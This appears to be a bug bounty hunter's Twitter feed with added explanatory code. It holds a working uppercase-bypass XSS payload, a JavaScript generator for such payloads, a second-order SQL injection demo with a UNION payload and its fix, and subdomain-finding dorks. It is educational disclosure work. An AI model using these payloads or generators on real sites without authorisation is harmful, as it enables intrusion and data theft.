Cybersecurity Researcher | Bug Bounty Hunter ❤

Joined November 2014
Pinned Tweet
VDP to Bounty!! I was awarded a $250 bounty on @Hacker0x01! I started hunting on a VDP. Luckily I found an open redirect. Reported it via their website's responsible disclosure page. Got a verification email from HackerOne. hackerone.com/hamzaavvan #TogetherWeHitHarder
Hamza Avvan retweeted
Done🙂
I just published in @gitconnected Quick & Easy $100 Bug That You Can Find In 5 minutes levelup.gitconnected.com/qui…

Check out my playlist: Road To Ethical Hacking youtube.com/playlist?list=PL… via @YouTube
Hamza Avvan retweeted
Dozens reported killed in explosion in northern Gaza refugee camp bbc.in/46No7YW
Hamza Avvan retweeted
3 Oct 2023
.@hamzaavvan has made some awesome YouTube Shorts answering my #AppSec interview questions! Check them out: youtube.com/playlist?list=PL…

Second-order SQL injection on the view parameter. 1. Create a malicious note with an SQLi payload through the /?note=<payload> parameter. 2. Go to /?view to execute your SQLi payload. #SQLI #bugbountytips
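The two-step flow in the tip above, as an added example that is not the author's code and not any real target: a hypothetical note-taking app with a /?note handler (step 1) and a /?view handler (step 2), written in Python on sqlite3. The first query is parameterized, so the payload is stored harmlessly; the second query concatenates the stored body into fresh SQL, which is where the injection finally fires. The tables, the secrets row and the payload are constructed sample data; the "list notes with an identical body" feature behind /?view is an assumption made for the demo.

```python
import sqlite3

# Constructed sample payload: closes the quote the vulnerable second query wraps
# the note body in, appends a UNION that reads another table, and comments out
# the trailing quote. Stored verbatim in step 1, executed in step 2.
SAMPLE_PAYLOAD = "x' UNION SELECT id, value FROM secrets --"


def make_db():
    """In-memory database with a notes table and a constructed 'secrets' table
    that the injection will read out. Sample data only."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE notes   (id INTEGER PRIMARY KEY, body  TEXT NOT NULL);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, value TEXT NOT NULL);
        INSERT INTO secrets (value) VALUES ('flag{constructed-sample-secret}');
        """
    )
    return conn


def save_note(conn, body):
    """Step 1: the /?note=<payload> handler. Assumed to use a bound parameter,
    so the payload is stored exactly as sent and nothing happens yet.
    Returns the new note id."""
    cur = conn.execute("INSERT INTO notes (body) VALUES (?)", (body,))
    conn.commit()
    return cur.lastrowid


def view_note_vulnerable(conn, note_id):
    """Step 2: the /?view handler. It reads the stored body back, trusts it
    because it 'came from our own database', and concatenates it into a
    second query (assumed feature: list notes with an identical body).
    That second query is the second-order injection point."""
    (body,) = conn.execute("SELECT body FROM notes WHERE id = ?", (note_id,)).fetchone()
    sql = f"SELECT id, body FROM notes WHERE body = '{body}'"  # the bug: string-built SQL
    return conn.execute(sql).fetchall()


def view_note_fixed(conn, note_id):
    """Same feature with the body bound as a parameter. Data read back from the
    database gets no more trust than data read from the request."""
    (body,) = conn.execute("SELECT body FROM notes WHERE id = ?", (note_id,)).fetchone()
    return conn.execute("SELECT id, body FROM notes WHERE body = ?", (body,)).fetchall()


def run_demo():
    """Store a benign note and the payload, then view them through each
    handler. Returns the rows each /?view call produced."""
    conn = make_db()
    benign_id = save_note(conn, "hello")            # id 1
    evil_id = save_note(conn, SAMPLE_PAYLOAD)       # id 2
    return {
        "benign_vulnerable": view_note_vulnerable(conn, benign_id),  # [(1, 'hello')]
        "payload_vulnerable": view_note_vulnerable(conn, evil_id),   # leaks the secrets row
        "payload_fixed": view_note_fixed(conn, evil_id),             # just the note itself
    }


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(f"{name}: {rows}")
```

The point to carry into a review: grep for string-built SQL anywhere, not only in handlers that read request parameters. A value that went through a parameterized INSERT is still attacker-controlled when it is read back.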
Vulnerable Code Snippet 💀 🥁 This time we have improved the experience by making it possible to run this code snippet in a docker environment! Can you find the bug this time? Practice your skills and try it yourself on our Github👇 github.com/yeswehack/vulnera… #YesWeRHackers #BugBounty #YWHSnippet
Worth trying for anyone who wants to improve their XSS skills or learn something new. XSS via stylesheet injection challenge by @yeswehack. #YesWeRHackers
Replying to @yeswehack
@yeswehack Is this the right way?
Accepted 😌
The HackerOne triager set its state to "pending program review". The program manager came, triaged my bug, and transferred the report from the VDP to its private program, and I got an invite too. After accepting the invite I was amazed to look at the bounty table 😁
That was a fascinating journey for this finding. Thanks @Hacker0x01 and the private program for all this. Moral of the story: never ignore the VDPs. #bugbountytip
I found even more subdomains and XSSs 😂 using dorks like: site:*.target.* site:*.target.com.* site:*.target-*.*.* #bugbountytips #dork #OSINT
Till today I used to think site:*.target.com meant all subdomains. 🤓 But that actually means just first-order subdomains! 😭 So if you search site:*.*.target.com you will get all second-order subdomains. site:*.*.*.target.com = third-order subdomains. #bugbountytip #BugBounty
🔴 Challenge: During hunting, I encountered a situation where injected code was converted to uppercase.
Eventually, I reported four XSS vulnerabilities to the Bugcrowd program using my payload, and all of them were triaged. Note: please encode the payload before injecting it, or the (+) which is used for concatenation would be interpreted as a space.
🆕Update to payload ✅Working Payload (Edge/Chrome/Firefox):
A=![]+'';B=!![]+'';C=[][[]]+'';F=[][C[4]+C[5]+A[2]+B[0]+A[4]+B[1]];D=F+'';F[D[3]+D[6]+C[1]+A[3]+B[0]+B[1]+C[0]+D[3]+B[0]+D[6]+B[1]](A[1]+A[2]+A[4]+B[1]+B[0]+'(1)')()
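An added example, not the author's code beyond the payload it reproduces: a script that models the upper-casing sink from the challenge above, regenerates the posted payload from a letter pool, and shows that it still executes after .toUpperCase(). It goes a little beyond the tweet: buildPayload() spells any target made of lowercase letters from the same pool, and refuses letters that do not occur in "false", "true", "undefined" or the first characters of String([].filter) (so "document.cookie" fails on 'm'). The sink function, the Node alert() stub and the hypothetical target page are assumptions for the demo.

```javascript
// Why the payload survives: every letter it needs is read at runtime from the
// string forms of false, true, undefined and Array.prototype.filter, so the
// injected source text contains no lowercase letters for the sink to break.
// Only digits, punctuation and the one-letter identifiers A-F appear literally.
//
// Runtime strings and the index of each usable letter (V8 and SpiderMonkey agree
// on "function filter()" but differ after the "{", so only D[3]='c' and
// D[6]='o' are taken from D):
//   A = ![] + ''        -> "false"
//   B = !![] + ''       -> "true"
//   C = [][[]] + ''     -> "undefined"
//   D = [].filter + ''  -> "function filter() { [native code] }"
const LETTER_SOURCES = {
  a: 'A[1]', c: 'D[3]', d: 'C[2]', e: 'A[4]', f: 'A[0]', i: 'C[5]', l: 'A[2]',
  n: 'C[1]', o: 'D[6]', r: 'B[1]', s: 'A[3]', t: 'B[0]', u: 'B[2]',
};

// F = [].filter, D = its string form; F["constructor"] is the Function constructor.
const PRELUDE = "A=![]+'';B=!![]+'';C=[][[]]+'';F=[][C[4]+C[5]+A[2]+B[0]+A[4]+B[1]];D=F+'';";
const CONSTRUCTOR = 'D[3]+D[6]+C[1]+A[3]+B[0]+B[1]+C[0]+D[3]+B[0]+D[6]+B[1]';

// The payload exactly as posted in the tweet, for comparison.
const TWEET_PAYLOAD = "A=![]+'';B=!![]+'';C=[][[]]+'';F=[][C[4]+C[5]+A[2]+B[0]+A[4]+B[1]];D=F+'';F[D[3]+D[6]+C[1]+A[3]+B[0]+B[1]+C[0]+D[3]+B[0]+D[6]+B[1]](A[1]+A[2]+A[4]+B[1]+B[0]+'(1)')()";

function quote(s) {
  return "'" + s.replace(/\\/g, '\\\\').replace(/'/g, "\\'") + "'";
}

// Spell `code` (the JavaScript to execute, e.g. "alert(1)") as a +-concatenation
// of pool letters and quoted literals, then wrap it in Function(...)(). Digits,
// punctuation and uppercase letters are left as literals because toUpperCase()
// does not change them; lowercase letters outside the pool cannot be expressed.
function buildPayload(code) {
  const parts = [];
  let literal = '';
  const flush = () => { if (literal) { parts.push(quote(literal)); literal = ''; } };
  for (const ch of code) {
    if (/[a-z]/.test(ch)) {
      const src = LETTER_SOURCES[ch];
      if (!src) throw new Error(`letter '${ch}' is not available from the pool`);
      flush();
      parts.push(src);
    } else {
      literal += ch;
    }
  }
  flush();
  return `${PRELUDE}F[${CONSTRUCTOR}](${parts.join('+')})()`;
}

// Stand-in for the vulnerable page (assumed behaviour, modelled on the tweet):
// the injected text is upper-cased and then evaluated as script.
function uppercasingSink(injected) {
  return Function(injected.toUpperCase())();
}

// In a browser the payload pops a real alert. Under Node there is no alert(), so
// install a recording stub; demo() returns what the payload passed to it.
const alertCalls = [];
if (typeof globalThis.alert !== 'function') {
  globalThis.alert = (msg) => { alertCalls.push(msg); };
}

function demo() {
  alertCalls.length = 0;
  const payload = buildPayload('alert(1)');
  uppercasingSink(payload);                       // runs the UPPER-CASED payload
  return {
    payload,
    uppercased: payload.toUpperCase(),
    encoded: encodeURIComponent(payload),         // '+' becomes %2B for a query string
    alertCalls: alertCalls.slice(),               // [1] under Node
  };
}
```

The encoded form is the practical half of the tweet's note: sent raw in a URL, every + is decoded as a space and the concatenation falls apart, so URL-encode the payload (or at least the plus signs) before injecting. buildPayload('alert(location)') also builds, since l, o, c, a, t, i and n are all in the pool, but it only runs in a browser.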